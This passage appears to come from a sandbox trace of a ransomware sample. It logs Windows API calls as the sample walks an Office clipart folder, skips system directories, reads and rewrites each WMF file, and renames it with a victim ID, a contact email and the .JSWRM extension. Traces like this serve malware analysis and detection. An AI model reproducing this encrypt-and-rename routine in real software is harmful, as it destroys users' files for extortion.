CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0085.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0085.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0085.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0085.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0085.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0085.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0085.349] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152890.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152890.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0085.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0085.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0085.350] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29ac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152892.WMF", cAlternateFileName="")) returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2=".") returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="..") returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="...") returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="windows") returned -1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="recovery") returned -1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="perflogs") returned -1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="documents and settings") returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="system volume information") returned -1 [0085.350] lstrcmpiW (lpString1="J0152892.WMF", lpString2="msocache") returned -1 [0085.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0085.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152892.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152892.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152892.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0085.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0085.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152892.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152892.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152892.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0085.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0085.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0085.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.352] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10668) returned 1 [0085.352] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24d210 [0085.352] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x29a0, lpOverlapped=0x0) returned 1 [0085.365] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.365] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x29a0, lpOverlapped=0x0) returned 1 [0085.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.366] CloseHandle (hObject=0x314) returned 1 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0085.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0085.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0085.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0085.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0085.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152892.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152892.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0085.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0085.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0085.367] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c54, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152894.WMF", cAlternateFileName="")) returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2=".") returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="..") returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="...") returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="windows") returned -1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="recovery") returned -1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="perflogs") returned -1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="documents and settings") returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="system volume information") returned -1 [0085.367] lstrcmpiW (lpString1="J0152894.WMF", lpString2="msocache") returned -1 [0085.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0085.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152894.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152894.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152894.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0085.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152894.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152894.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152894.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0085.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0085.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0085.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.368] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11348) returned 1 [0085.368] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c50) returned 0x24d210 [0085.368] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2c50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2c50, lpOverlapped=0x0) returned 1 [0085.380] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.380] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2c50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2c50, lpOverlapped=0x0) returned 1 [0085.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.380] CloseHandle (hObject=0x314) returned 1 [0085.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0085.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0085.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0085.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0085.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0085.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0085.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152894.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152894.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0085.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0085.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0085.382] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea574b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea574b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea574b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1190, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152898.WMF", cAlternateFileName="")) returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2=".") returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="..") returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="...") returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="windows") returned -1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="recovery") returned -1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="perflogs") returned -1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="documents and settings") returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="system volume information") returned -1 [0085.382] lstrcmpiW (lpString1="J0152898.WMF", lpString2="msocache") returned -1 [0085.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152898.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152898.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152898.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152898.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152898.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152898.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0085.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.383] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4496) returned 1 [0085.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1190) returned 0x205850 [0085.383] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1190, lpOverlapped=0x0) returned 1 [0085.403] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.403] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1190, lpOverlapped=0x0) returned 1 [0085.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.403] CloseHandle (hObject=0x314) returned 1 [0085.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.403] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0085.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0085.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0085.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0085.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0085.404] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152898.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152898.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0085.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.404] FindNextFileW (in: 